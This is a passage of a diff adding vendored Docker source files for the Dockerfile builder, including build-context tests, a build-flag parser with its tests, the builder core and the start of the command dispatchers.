+
+	if relDockerfile != DefaultDockerfileName {
+		t.Fatalf("Relative path to dockerfile should be equal to %s, got: %s", DefaultDockerfileName, relDockerfile)
+	}
+
+}
+
+func TestGetContextFromReaderString(t *testing.T) {
+	tarArchive, relDockerfile, err := GetContextFromReader(ioutil.NopCloser(strings.NewReader(dockerfileContents)), "")
+
+	if err != nil {
+		t.Fatalf("Error when executing GetContextFromReader: %s", err)
+	}
+
+	tarReader := tar.NewReader(tarArchive)
+
+	_, err = tarReader.Next()
+
+	if err != nil {
+		t.Fatalf("Error when reading tar archive: %s", err)
+	}
+
+	buff := new(bytes.Buffer)
+	buff.ReadFrom(tarReader)
+	contents := buff.String()
+
+	_, err = tarReader.Next()
+
+	if err != io.EOF {
+		t.Fatalf("Tar stream too long: %s", err)
+	}
+
+	if err = tarArchive.Close(); err != nil {
+		t.Fatalf("Error when closing tar stream: %s", err)
+	}
+
+	if dockerfileContents != contents {
+		t.Fatalf("Uncompressed tar archive does not equal: %s, got: %s", dockerfileContents, contents)
+	}
+
+	if relDockerfile != DefaultDockerfileName {
+		t.Fatalf("Relative path not equals %s, got: %s", DefaultDockerfileName, relDockerfile)
+	}
+}
+
+func TestGetContextFromReaderTar(t *testing.T) {
+	contextDir, cleanup := createTestTempDir(t, "", "builder-context-test")
+	defer cleanup()
+
+	createTestTempFile(t, contextDir, DefaultDockerfileName, dockerfileContents, 0777)
+
+	tarStream, err := archive.Tar(contextDir, archive.Uncompressed)
+
+	if err != nil {
+		t.Fatalf("Error when creating tar: %s", err)
+	}
+
+	tarArchive, relDockerfile, err := GetContextFromReader(tarStream, DefaultDockerfileName)
+
+	if err != nil {
+		t.Fatalf("Error when executing GetContextFromReader: %s", err)
+	}
+
+	tarReader := tar.NewReader(tarArchive)
+
+	header, err := tarReader.Next()
+
+	if err != nil {
+		t.Fatalf("Error when reading tar archive: %s", err)
+	}
+
+	if header.Name != DefaultDockerfileName {
+		t.Fatalf("Dockerfile name should be: %s, got: %s", DefaultDockerfileName, header.Name)
+	}
+
+	buff := new(bytes.Buffer)
+	buff.ReadFrom(tarReader)
+	contents := buff.String()
+
+	_, err = tarReader.Next()
+
+	if err != io.EOF {
+		t.Fatalf("Tar stream too long: %s", err)
+	}
+
+	if err = tarArchive.Close(); err != nil {
+		t.Fatalf("Error when closing tar stream: %s", err)
+	}
+
+	if dockerfileContents != contents {
+		t.Fatalf("Uncompressed tar archive does not equal: %s, got: %s", dockerfileContents, contents)
+	}
+
+	if relDockerfile != DefaultDockerfileName {
+		t.Fatalf("Relative path not equals %s, got: %s", DefaultDockerfileName, relDockerfile)
+	}
+}
+
+func TestValidateContextDirectoryEmptyContext(t *testing.T) {
+	// This isn't a valid test on Windows. See https://play.golang.org/p/RR6z6jxR81.
+	// The test will ultimately end up calling filepath.Abs(""). On Windows,
+	// golang will error. On Linux, golang will return /. Due to there being
+	// drive letters on Windows, this is probably the correct behaviour for
+	// Windows.
+	if runtime.GOOS == "windows" {
+		t.Skip("Invalid test on Windows")
+	}
+	testValidateContextDirectory(t, prepareEmpty, []string{})
+}
+
+func TestValidateContextDirectoryContextWithNoFiles(t *testing.T) {
+	testValidateContextDirectory(t, prepareNoFiles, []string{})
+}
+
+func TestValidateContextDirectoryWithOneFile(t *testing.T) {
+	testValidateContextDirectory(t, prepareOneFile, []string{})
+}
+
+func TestValidateContextDirectoryWithOneFileExcludes(t *testing.T) {
+	testValidateContextDirectory(t, prepareOneFile, []string{DefaultDockerfileName})
+}
diff --git a/vendor/github.com/docker/docker/builder/context_unix.go b/vendor/github.com/docker/docker/builder/context_unix.go
new file mode 100644
index 0000000000..d1f72e0573
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/context_unix.go
@@ -0,0 +1,11 @@
+// +build !windows
+
+package builder
+
+import (
+	"path/filepath"
+)
+
+func getContextRoot(srcPath string) (string, error) {
+	return filepath.Join(srcPath, "."), nil
+}
diff --git a/vendor/github.com/docker/docker/builder/context_windows.go b/vendor/github.com/docker/docker/builder/context_windows.go
new file mode 100644
index 0000000000..b8ba2ba231
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/context_windows.go
@@ -0,0 +1,17 @@
+// +build windows
+
+package builder
+
+import (
+	"path/filepath"
+
+	"github.com/docker/docker/pkg/longpath"
+)
+
+func getContextRoot(srcPath string) (string, error) {
+	cr, err := filepath.Abs(srcPath)
+	if err != nil {
+		return "", err
+	}
+	return longpath.AddPrefix(cr), nil
+}
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/bflag.go b/vendor/github.com/docker/docker/builder/dockerfile/bflag.go
new file mode 100644
index 0000000000..1e03693072
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/bflag.go
@@ -0,0 +1,176 @@
+package dockerfile
+
+import (
+	"fmt"
+	"strings"
+)
+
+// FlagType is the type of the build flag
+type FlagType int
+
+const (
+	boolType FlagType = iota
+	stringType
+)
+
+// BFlags contains all flags information for the builder
+type BFlags struct {
+	Args  []string // actual flags/args from cmd line
+	flags map[string]*Flag
+	used  map[string]*Flag
+	Err   error
+}
+
+// Flag contains all information for a flag
+type Flag struct {
+	bf       *BFlags
+	name     string
+	flagType FlagType
+	Value    string
+}
+
+// NewBFlags returns the new BFlags struct
+func NewBFlags() *BFlags {
+	return &BFlags{
+		flags: make(map[string]*Flag),
+		used:  make(map[string]*Flag),
+	}
+}
+
+// AddBool adds a bool flag to BFlags
+// Note, any error will be generated when Parse() is called (see Parse).
+func (bf *BFlags) AddBool(name string, def bool) *Flag {
+	flag := bf.addFlag(name, boolType)
+	if flag == nil {
+		return nil
+	}
+	if def {
+		flag.Value = "true"
+	} else {
+		flag.Value = "false"
+	}
+	return flag
+}
+
+// AddString adds a string flag to BFlags
+// Note, any error will be generated when Parse() is called (see Parse).
+func (bf *BFlags) AddString(name string, def string) *Flag {
+	flag := bf.addFlag(name, stringType)
+	if flag == nil {
+		return nil
+	}
+	flag.Value = def
+	return flag
+}
+
+// addFlag is a generic func used by the other AddXXX() func
+// to add a new flag to the BFlags struct.
+// Note, any error will be generated when Parse() is called (see Parse).
+func (bf *BFlags) addFlag(name string, flagType FlagType) *Flag {
+	if _, ok := bf.flags[name]; ok {
+		bf.Err = fmt.Errorf("Duplicate flag defined: %s", name)
+		return nil
+	}
+
+	newFlag := &Flag{
+		bf:       bf,
+		name:     name,
+		flagType: flagType,
+	}
+	bf.flags[name] = newFlag
+
+	return newFlag
+}
+
+// IsUsed checks if the flag is used
+func (fl *Flag) IsUsed() bool {
+	if _, ok := fl.bf.used[fl.name]; ok {
+		return true
+	}
+	return false
+}
+
+// IsTrue checks if a bool flag is true
+func (fl *Flag) IsTrue() bool {
+	if fl.flagType != boolType {
+		// Should never get here
+		panic(fmt.Errorf("Trying to use IsTrue on a non-boolean: %s", fl.name))
+	}
+	return fl.Value == "true"
+}
+
+// Parse parses and checks if the BFlags is valid.
+// Any error noticed during the AddXXX() funcs will be generated/returned
+// here.  We do this because an error during AddXXX() is more like a
+// compile time error so it doesn't matter too much when we stop our
+// processing as long as we do stop it, so this allows the code
+// around AddXXX() to be just:
+//     defFlag := AddString("description", "")
+// w/o needing to add an if-statement around each one.
+func (bf *BFlags) Parse() error {
+	// If there was an error while defining the possible flags
+	// go ahead and bubble it back up here since we didn't do it
+	// earlier in the processing
+	if bf.Err != nil {
+		return fmt.Errorf("Error setting up flags: %s", bf.Err)
+	}
+
+	for _, arg := range bf.Args {
+		if !strings.HasPrefix(arg, "--") {
+			return fmt.Errorf("Arg should start with -- : %s", arg)
+		}
+
+		if arg == "--" {
+			return nil
+		}
+
+		arg = arg[2:]
+		value := ""
+
+		index := strings.Index(arg, "=")
+		if index >= 0 {
+			value = arg[index+1:]
+			arg = arg[:index]
+		}
+
+		flag, ok := bf.flags[arg]
+		if !ok {
+			return fmt.Errorf("Unknown flag: %s", arg)
+		}
+
+		if _, ok = bf.used[arg]; ok {
+			return fmt.Errorf("Duplicate flag specified: %s", arg)
+		}
+
+		bf.used[arg] = flag
+
+		switch flag.flagType {
+		case boolType:
+			// value == "" is only ok if no "=" was specified
+			if index >= 0 && value == "" {
+				return fmt.Errorf("Missing a value on flag: %s", arg)
+			}
+
+			lower := strings.ToLower(value)
+			if lower == "" {
+				flag.Value = "true"
+			} else if lower == "true" || lower == "false" {
+				flag.Value = lower
+			} else {
+				return fmt.Errorf("Expecting boolean value for flag %s, not: %s", arg, value)
+			}
+
+		case stringType:
+			if index < 0 {
+				return fmt.Errorf("Missing a value on flag: %s", arg)
+			}
+			flag.Value = value
+
+		default:
+			panic(fmt.Errorf("No idea what kind of flag we have! Should never get here!"))
+		}
+
+	}
+
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/bflag_test.go b/vendor/github.com/docker/docker/builder/dockerfile/bflag_test.go
new file mode 100644
index 0000000000..65cfceadd0
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/bflag_test.go
@@ -0,0 +1,187 @@
+package dockerfile
+
+import (
+	"testing"
+)
+
+func TestBuilderFlags(t *testing.T) {
+	var expected string
+	var err error
+
+	// ---
+
+	bf := NewBFlags()
+	bf.Args = []string{}
+	if err := bf.Parse(); err != nil {
+		t.Fatalf("Test1 of %q was supposed to work: %s", bf.Args, err)
+	}
+
+	// ---
+
+	bf = NewBFlags()
+	bf.Args = []string{"--"}
+	if err := bf.Parse(); err != nil {
+		t.Fatalf("Test2 of %q was supposed to work: %s", bf.Args, err)
+	}
+
+	// ---
+
+	bf = NewBFlags()
+	flStr1 := bf.AddString("str1", "")
+	flBool1 := bf.AddBool("bool1", false)
+	bf.Args = []string{}
+	if err = bf.Parse(); err != nil {
+		t.Fatalf("Test3 of %q was supposed to work: %s", bf.Args, err)
+	}
+
+	if flStr1.IsUsed() == true {
+		t.Fatalf("Test3 - str1 was not used!")
+	}
+	if flBool1.IsUsed() == true {
+		t.Fatalf("Test3 - bool1 was not used!")
+	}
+
+	// ---
+
+	bf = NewBFlags()
+	flStr1 = bf.AddString("str1", "HI")
+	flBool1 = bf.AddBool("bool1", false)
+	bf.Args = []string{}
+
+	if err = bf.Parse(); err != nil {
+		t.Fatalf("Test4 of %q was supposed to work: %s", bf.Args, err)
+	}
+
+	if flStr1.Value != "HI" {
+		t.Fatalf("Str1 was supposed to default to: HI")
+	}
+	if flBool1.IsTrue() {
+		t.Fatalf("Bool1 was supposed to default to: false")
+	}
+	if flStr1.IsUsed() == true {
+		t.Fatalf("Str1 was not used!")
+	}
+	if flBool1.IsUsed() == true {
+		t.Fatalf("Bool1 was not used!")
+	}
+
+	// ---
+
+	bf = NewBFlags()
+	flStr1 = bf.AddString("str1", "HI")
+	bf.Args = []string{"--str1"}
+
+	if err = bf.Parse(); err == nil {
+		t.Fatalf("Test %q was supposed to fail", bf.Args)
+	}
+
+	// ---
+
+	bf = NewBFlags()
+	flStr1 = bf.AddString("str1", "HI")
+	bf.Args = []string{"--str1="}
+
+	if err = bf.Parse(); err != nil {
+		t.Fatalf("Test %q was supposed to work: %s", bf.Args, err)
+	}
+
+	expected = ""
+	if flStr1.Value != expected {
+		t.Fatalf("Str1 (%q) should be: %q", flStr1.Value, expected)
+	}
+
+	// ---
+
+	bf = NewBFlags()
+	flStr1 = bf.AddString("str1", "HI")
+	bf.Args = []string{"--str1=BYE"}
+
+	if err = bf.Parse(); err != nil {
+		t.Fatalf("Test %q was supposed to work: %s", bf.Args, err)
+	}
+
+	expected = "BYE"
+	if flStr1.Value != expected {
+		t.Fatalf("Str1 (%q) should be: %q", flStr1.Value, expected)
+	}
+
+	// ---
+
+	bf = NewBFlags()
+	flBool1 = bf.AddBool("bool1", false)
+	bf.Args = []string{"--bool1"}
+
+	if err = bf.Parse(); err != nil {
+		t.Fatalf("Test %q was supposed to work: %s", bf.Args, err)
+	}
+
+	if !flBool1.IsTrue() {
+		t.Fatalf("Test-b1 Bool1 was supposed to be true")
+	}
+
+	// ---
+
+	bf = NewBFlags()
+	flBool1 = bf.AddBool("bool1", false)
+	bf.Args = []string{"--bool1=true"}
+
+	if err = bf.Parse(); err != nil {
+		t.Fatalf("Test %q was supposed to work: %s", bf.Args, err)
+	}
+
+	if !flBool1.IsTrue() {
+		t.Fatalf("Test-b2 Bool1 was supposed to be true")
+	}
+
+	// ---
+
+	bf = NewBFlags()
+	flBool1 = bf.AddBool("bool1", false)
+	bf.Args = []string{"--bool1=false"}
+
+	if err = bf.Parse(); err != nil {
+		t.Fatalf("Test %q was supposed to work: %s", bf.Args, err)
+	}
+
+	if flBool1.IsTrue() {
+		t.Fatalf("Test-b3 Bool1 was supposed to be false")
+	}
+
+	// ---
+
+	bf = NewBFlags()
+	flBool1 = bf.AddBool("bool1", false)
+	bf.Args = []string{"--bool1=false1"}
+
+	if err = bf.Parse(); err == nil {
+		t.Fatalf("Test %q was supposed to fail", bf.Args)
+	}
+
+	// ---
+
+	bf = NewBFlags()
+	flBool1 = bf.AddBool("bool1", false)
+	bf.Args = []string{"--bool2"}
+
+	if err = bf.Parse(); err == nil {
+		t.Fatalf("Test %q was supposed to fail", bf.Args)
+	}
+
+	// ---
+
+	bf = NewBFlags()
+	flStr1 = bf.AddString("str1", "HI")
+	flBool1 = bf.AddBool("bool1", false)
+	bf.Args = []string{"--bool1", "--str1=BYE"}
+
+	if err = bf.Parse(); err != nil {
+		t.Fatalf("Test %q was supposed to work: %s", bf.Args, err)
+	}
+
+	if flStr1.Value != "BYE" {
+		t.Fatalf("Teset %s, str1 should be BYE", bf.Args)
+	}
+	if !flBool1.IsTrue() {
+		t.Fatalf("Teset %s, bool1 should be true", bf.Args)
+	}
+}
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/builder.go b/vendor/github.com/docker/docker/builder/dockerfile/builder.go
new file mode 100644
index 0000000000..da43513fff
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/builder.go
@@ -0,0 +1,370 @@
+package dockerfile
+
+import (
+	"bytes"
+	"errors"
+	"fmt"
+	"io"
+	"io/ioutil"
+	"os"
+	"strings"
+
+	"github.com/Sirupsen/logrus"
+	apierrors "github.com/docker/docker/api/errors"
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/backend"
+	"github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/builder"
+	"github.com/docker/docker/builder/dockerfile/parser"
+	"github.com/docker/docker/image"
+	"github.com/docker/docker/pkg/stringid"
+	"github.com/docker/docker/reference"
+	perrors "github.com/pkg/errors"
+	"golang.org/x/net/context"
+)
+
+var validCommitCommands = map[string]bool{
+	"cmd":         true,
+	"entrypoint":  true,
+	"healthcheck": true,
+	"env":         true,
+	"expose":      true,
+	"label":       true,
+	"onbuild":     true,
+	"user":        true,
+	"volume":      true,
+	"workdir":     true,
+}
+
+// BuiltinAllowedBuildArgs is list of built-in allowed build args
+var BuiltinAllowedBuildArgs = map[string]bool{
+	"HTTP_PROXY":  true,
+	"http_proxy":  true,
+	"HTTPS_PROXY": true,
+	"https_proxy": true,
+	"FTP_PROXY":   true,
+	"ftp_proxy":   true,
+	"NO_PROXY":    true,
+	"no_proxy":    true,
+}
+
+// Builder is a Dockerfile builder
+// It implements the builder.Backend interface.
+type Builder struct {
+	options *types.ImageBuildOptions
+
+	Stdout io.Writer
+	Stderr io.Writer
+	Output io.Writer
+
+	docker    builder.Backend
+	context   builder.Context
+	clientCtx context.Context
+	cancel    context.CancelFunc
+
+	dockerfile       *parser.Node
+	runConfig        *container.Config // runconfig for cmd, run, entrypoint etc.
+	flags            *BFlags
+	tmpContainers    map[string]struct{}
+	image            string // imageID
+	noBaseImage      bool
+	maintainer       string
+	cmdSet           bool
+	disableCommit    bool
+	cacheBusted      bool
+	allowedBuildArgs map[string]bool // list of build-time args that are allowed for expansion/substitution and passing to commands in 'run'.
+	directive        parser.Directive
+
+	// TODO: remove once docker.Commit can receive a tag
+	id string
+
+	imageCache builder.ImageCache
+	from       builder.Image
+}
+
+// BuildManager implements builder.Backend and is shared across all Builder objects.
+type BuildManager struct {
+	backend builder.Backend
+}
+
+// NewBuildManager creates a BuildManager.
+func NewBuildManager(b builder.Backend) (bm *BuildManager) {
+	return &BuildManager{backend: b}
+}
+
+// BuildFromContext builds a new image from a given context.
+func (bm *BuildManager) BuildFromContext(ctx context.Context, src io.ReadCloser, remote string, buildOptions *types.ImageBuildOptions, pg backend.ProgressWriter) (string, error) {
+	if buildOptions.Squash && !bm.backend.HasExperimental() {
+		return "", apierrors.NewBadRequestError(errors.New("squash is only supported with experimental mode"))
+	}
+	buildContext, dockerfileName, err := builder.DetectContextFromRemoteURL(src, remote, pg.ProgressReaderFunc)
+	if err != nil {
+		return "", err
+	}
+	defer func() {
+		if err := buildContext.Close(); err != nil {
+			logrus.Debugf("[BUILDER] failed to remove temporary context: %v", err)
+		}
+	}()
+
+	if len(dockerfileName) > 0 {
+		buildOptions.Dockerfile = dockerfileName
+	}
+	b, err := NewBuilder(ctx, buildOptions, bm.backend, builder.DockerIgnoreContext{ModifiableContext: buildContext}, nil)
+	if err != nil {
+		return "", err
+	}
+	return b.build(pg.StdoutFormatter, pg.StderrFormatter, pg.Output)
+}
+
+// NewBuilder creates a new Dockerfile builder from an optional dockerfile and a Config.
+// If dockerfile is nil, the Dockerfile specified by Config.DockerfileName,
+// will be read from the Context passed to Build().
+func NewBuilder(clientCtx context.Context, config *types.ImageBuildOptions, backend builder.Backend, buildContext builder.Context, dockerfile io.ReadCloser) (b *Builder, err error) {
+	if config == nil {
+		config = new(types.ImageBuildOptions)
+	}
+	if config.BuildArgs == nil {
+		config.BuildArgs = make(map[string]*string)
+	}
+	ctx, cancel := context.WithCancel(clientCtx)
+	b = &Builder{
+		clientCtx:        ctx,
+		cancel:           cancel,
+		options:          config,
+		Stdout:           os.Stdout,
+		Stderr:           os.Stderr,
+		docker:           backend,
+		context:          buildContext,
+		runConfig:        new(container.Config),
+		tmpContainers:    map[string]struct{}{},
+		id:               stringid.GenerateNonCryptoID(),
+		allowedBuildArgs: make(map[string]bool),
+		directive: parser.Directive{
+			EscapeSeen:           false,
+			LookingForDirectives: true,
+		},
+	}
+	if icb, ok := backend.(builder.ImageCacheBuilder); ok {
+		b.imageCache = icb.MakeImageCache(config.CacheFrom)
+	}
+
+	parser.SetEscapeToken(parser.DefaultEscapeToken, &b.directive) // Assume the default token for escape
+
+	if dockerfile != nil {
+		b.dockerfile, err = parser.Parse(dockerfile, &b.directive)
+		if err != nil {
+			return nil, err
+		}
+	}
+
+	return b, nil
+}
+
+// sanitizeRepoAndTags parses the raw "t" parameter received from the client
+// to a slice of repoAndTag.
+// It also validates each repoName and tag.
+func sanitizeRepoAndTags(names []string) ([]reference.Named, error) {
+	var (
+		repoAndTags []reference.Named
+		// This map is used for deduplicating the "-t" parameter.
+		uniqNames = make(map[string]struct{})
+	)
+	for _, repo := range names {
+		if repo == "" {
+			continue
+		}
+
+		ref, err := reference.ParseNamed(repo)
+		if err != nil {
+			return nil, err
+		}
+
+		ref = reference.WithDefaultTag(ref)
+
+		if _, isCanonical := ref.(reference.Canonical); isCanonical {
+			return nil, errors.New("build tag cannot contain a digest")
+		}
+
+		if _, isTagged := ref.(reference.NamedTagged); !isTagged {
+			ref, err = reference.WithTag(ref, reference.DefaultTag)
+			if err != nil {
+				return nil, err
+			}
+		}
+
+		nameWithTag := ref.String()
+
+		if _, exists := uniqNames[nameWithTag]; !exists {
+			uniqNames[nameWithTag] = struct{}{}
+			repoAndTags = append(repoAndTags, ref)
+		}
+	}
+	return repoAndTags, nil
+}
+
+// build runs the Dockerfile builder from a context and a docker object that allows to make calls
+// to Docker.
+//
+// This will (barring errors):
+//
+// * read the dockerfile from context
+// * parse the dockerfile if not already parsed
+// * walk the AST and execute it by dispatching to handlers. If Remove
+//   or ForceRemove is set, additional cleanup around containers happens after
+//   processing.
+// * Tag image, if applicable.
+// * Print a happy message and return the image ID.
+//
+func (b *Builder) build(stdout io.Writer, stderr io.Writer, out io.Writer) (string, error) {
+	b.Stdout = stdout
+	b.Stderr = stderr
+	b.Output = out
+
+	// If Dockerfile was not parsed yet, extract it from the Context
+	if b.dockerfile == nil {
+		if err := b.readDockerfile(); err != nil {
+			return "", err
+		}
+	}
+
+	repoAndTags, err := sanitizeRepoAndTags(b.options.Tags)
+	if err != nil {
+		return "", err
+	}
+
+	if len(b.options.Labels) > 0 {
+		line := "LABEL "
+		for k, v := range b.options.Labels {
+			line += fmt.Sprintf("%q='%s' ", k, v)
+		}
+		_, node, err := parser.ParseLine(line, &b.directive, false)
+		if err != nil {
+			return "", err
+		}
+		b.dockerfile.Children = append(b.dockerfile.Children, node)
+	}
+
+	var shortImgID string
+	total := len(b.dockerfile.Children)
+	for _, n := range b.dockerfile.Children {
+		if err := b.checkDispatch(n, false); err != nil {
+			return "", err
+		}
+	}
+
+	for i, n := range b.dockerfile.Children {
+		select {
+		case <-b.clientCtx.Done():
+			logrus.Debug("Builder: build cancelled!")
+			fmt.Fprintf(b.Stdout, "Build cancelled")
+			return "", fmt.Errorf("Build cancelled")
+		default:
+			// Not cancelled yet, keep going...
+		}
+
+		if err := b.dispatch(i, total, n); err != nil {
+			if b.options.ForceRemove {
+				b.clearTmp()
+			}
+			return "", err
+		}
+
+		shortImgID = stringid.TruncateID(b.image)
+		fmt.Fprintf(b.Stdout, " ---> %s\n", shortImgID)
+		if b.options.Remove {
+			b.clearTmp()
+		}
+	}
+
+	// check if there are any leftover build-args that were passed but not
+	// consumed during build. Return a warning, if there are any.
+	leftoverArgs := []string{}
+	for arg := range b.options.BuildArgs {
+		if !b.isBuildArgAllowed(arg) {
+			leftoverArgs = append(leftoverArgs, arg)
+		}
+	}
+
+	if len(leftoverArgs) > 0 {
+		fmt.Fprintf(b.Stderr, "[Warning] One or more build-args %v were not consumed\n", leftoverArgs)
+	}
+
+	if b.image == "" {
+		return "", fmt.Errorf("No image was generated. Is your Dockerfile empty?")
+	}
+
+	if b.options.Squash {
+		var fromID string
+		if b.from != nil {
+			fromID = b.from.ImageID()
+		}
+		b.image, err = b.docker.SquashImage(b.image, fromID)
+		if err != nil {
+			return "", perrors.Wrap(err, "error squashing image")
+		}
+	}
+
+	imageID := image.ID(b.image)
+	for _, rt := range repoAndTags {
+		if err := b.docker.TagImageWithReference(imageID, rt); err != nil {
+			return "", err
+		}
+	}
+
+	fmt.Fprintf(b.Stdout, "Successfully built %s\n", shortImgID)
+	return b.image, nil
+}
+
+// Cancel cancels an ongoing Dockerfile build.
+func (b *Builder) Cancel() {
+	b.cancel()
+}
+
+// BuildFromConfig builds directly from `changes`, treating it as if it were the contents of a Dockerfile
+// It will:
+// - Call parse.Parse() to get an AST root for the concatenated Dockerfile entries.
+// - Do build by calling builder.dispatch() to call all entries' handling routines
+//
+// BuildFromConfig is used by the /commit endpoint, with the changes
+// coming from the query parameter of the same name.
+//
+// TODO: Remove?
+func BuildFromConfig(config *container.Config, changes []string) (*container.Config, error) {
+	b, err := NewBuilder(context.Background(), nil, nil, nil, nil)
+	if err != nil {
+		return nil, err
+	}
+
+	ast, err := parser.Parse(bytes.NewBufferString(strings.Join(changes, "\n")), &b.directive)
+	if err != nil {
+		return nil, err
+	}
+
+	// ensure that the commands are valid
+	for _, n := range ast.Children {
+		if !validCommitCommands[n.Value] {
+			return nil, fmt.Errorf("%s is not a valid change command", n.Value)
+		}
+	}
+
+	b.runConfig = config
+	b.Stdout = ioutil.Discard
+	b.Stderr = ioutil.Discard
+	b.disableCommit = true
+
+	total := len(ast.Children)
+	for _, n := range ast.Children {
+		if err := b.checkDispatch(n, false); err != nil {
+			return nil, err
+		}
+	}
+
+	for i, n := range ast.Children {
+		if err := b.dispatch(i, total, n); err != nil {
+			return nil, err
+		}
+	}
+
+	return b.runConfig, nil
+}
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/builder_unix.go b/vendor/github.com/docker/docker/builder/dockerfile/builder_unix.go
new file mode 100644
index 0000000000..76a7ce74f9
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/builder_unix.go
@@ -0,0 +1,5 @@
+// +build !windows
+
+package dockerfile
+
+var defaultShell = []string{"/bin/sh", "-c"}
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/builder_windows.go b/vendor/github.com/docker/docker/builder/dockerfile/builder_windows.go
new file mode 100644
index 0000000000..37e9fbcf4b
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/builder_windows.go
@@ -0,0 +1,3 @@
+package dockerfile
+
+var defaultShell = []string{"cmd", "/S", "/C"}
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/command/command.go b/vendor/github.com/docker/docker/builder/dockerfile/command/command.go
new file mode 100644
index 0000000000..f23c6874b5
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/command/command.go
@@ -0,0 +1,46 @@
+// Package command contains the set of Dockerfile commands.
+package command
+
+// Define constants for the command strings
+const (
+	Add         = "add"
+	Arg         = "arg"
+	Cmd         = "cmd"
+	Copy        = "copy"
+	Entrypoint  = "entrypoint"
+	Env         = "env"
+	Expose      = "expose"
+	From        = "from"
+	Healthcheck = "healthcheck"
+	Label       = "label"
+	Maintainer  = "maintainer"
+	Onbuild     = "onbuild"
+	Run         = "run"
+	Shell       = "shell"
+	StopSignal  = "stopsignal"
+	User        = "user"
+	Volume      = "volume"
+	Workdir     = "workdir"
+)
+
+// Commands is list of all Dockerfile commands
+var Commands = map[string]struct{}{
+	Add:         {},
+	Arg:         {},
+	Cmd:         {},
+	Copy:        {},
+	Entrypoint:  {},
+	Env:         {},
+	Expose:      {},
+	From:        {},
+	Healthcheck: {},
+	Label:       {},
+	Maintainer:  {},
+	Onbuild:     {},
+	Run:         {},
+	Shell:       {},
+	StopSignal:  {},
+	User:        {},
+	Volume:      {},
+	Workdir:     {},
+}
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/dispatchers.go b/vendor/github.com/docker/docker/builder/dockerfile/dispatchers.go
new file mode 100644
index 0000000000..3e78abdd68
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/dispatchers.go
@@ -0,0 +1,821 @@
+package dockerfile
+
+// This file contains the dispatchers for each command. Note that
+// `nullDispatch` is not actually a command, but support for commands we parse
+// but do nothing with.
+//
+// See evaluator.go for a higher level discussion of the whole evaluator
+// package.
+
+import (
+	"fmt"
+	"regexp"
+	"runtime"
+	"sort"
+	"strconv"
+	"strings"
+	"time"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/docker/api"
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/api/types/strslice"
+	"github.com/docker/docker/builder"
+	"github.com/docker/docker/pkg/signal"
+	runconfigopts "github.com/docker/docker/runconfig/opts"
+	"github.com/docker/go-connections/nat"
+)
+
+// ENV foo bar
+//
+// Sets the environment variable foo to bar, also makes interpolation
+// in the dockerfile available from the next statement on via ${foo}.
+//
+func env(b *Builder, args []string, attributes map[string]bool, original string) error {
+	if len(args) == 0 {
+		return errAtLeastOneArgument("ENV")
+	}
+
+	if len(args)%2 != 0 {
+		// should never get here, but just in case
+		return errTooManyArguments("ENV")
+	}
+
+	if err := b.flags.Parse(); err != nil {
+		return err
+	}
+
+	// TODO/FIXME/NOT USED
+	// Just here to show how to use the builder flags stuff within the
+	// context of a builder command. Will remove once we actually add
+	// a builder command to something!
+	/*
+		flBool1 := b.flags.AddBool("bool1", false)
+		flStr1 := b.flags.AddString("str1", "HI")
+
+		if err := b.flags.Parse(); err != nil {
+			return err
+		}
+
+		fmt.Printf("Bool1:%v\n", flBool1)
+		fmt.Printf("Str1:%v\n", flStr1)
+	*/
+
+	commitStr := "ENV"
+
+	for j := 0; j < len(args); j++ {
+		// name  ==> args[j]
+		// value ==> args[j+1]
+
+		if len(args[j]) == 0 {
+			return errBlankCommandNames("ENV")
+		}
+		newVar := args[j] + "=" + args[j+1] + ""
+		commitStr += " " + newVar
+
+		gotOne := false
+		for i, envVar := range b.runConfig.Env {
+			envParts := strings.SplitN(envVar, "=", 2)
+			compareFrom := envParts[0]
+			compareTo := args[j]
+			if runtime.GOOS == "windows" {
+				// Case insensitive environment variables on Windows
+				compareFrom = strings.ToUpper(compareFrom)
+				compareTo = strings.ToUpper(compareTo)
+			}
+			if compareFrom == compareTo {
+				b.runConfig.Env[i] = newVar
+				gotOne = true
+				break
+			}
+		}
+		if !gotOne {
+			b.runConfig.Env = append(b.runConfig.Env, newVar)
+		}
+		j++
+	}
+
+	return b.commit("", b.runConfig.Cmd, commitStr)
+}
+
+// MAINTAINER some text <maybe@an.email.address>
+//
+// Sets the maintainer metadata.
+func maintainer(b *Builder, args []string, attributes map[string]bool, original string) error {
+	if len(args) != 1 {
+		return errExactlyOneArgument("MAINTAINER")
+	}
+
+	if err := b.flags.Parse(); err != nil {
+		return err
+	}
+
+	b.maintainer = args[0]
+	return b.commit("", b.runConfig.Cmd, fmt.Sprintf("MAINTAINER %s", b.maintainer))
+}
+
+// LABEL some json data describing the image
+//
+// Sets the Label variable foo to bar,
+//
+func label(b *Builder, args []string, attributes map[string]bool, original string) error {
+	if len(args) == 0 {
+		return errAtLeastOneArgument("LABEL")
+	}
+	if len(args)%2 != 0 {
+		// should never get here, but just in case
+		return errTooManyArguments("LABEL")
+	}
+
+	if err := b.flags.Parse(); err != nil {
+		return err
+	}
+
+	commitStr := "LABEL"
+
+	if b.runConfig.Labels == nil {
+		b.runConfig.Labels = map[string]string{}
+	}
+
+	for j := 0; j < len(args); j++ {
+		// name  ==> args[j]
+		// value ==> args[j+1]
+
+		if len(args[j]) == 0 {
+			return errBlankCommandNames("LABEL")
+		}
+
+		newVar := args[j] + "=" + args[j+1] + ""
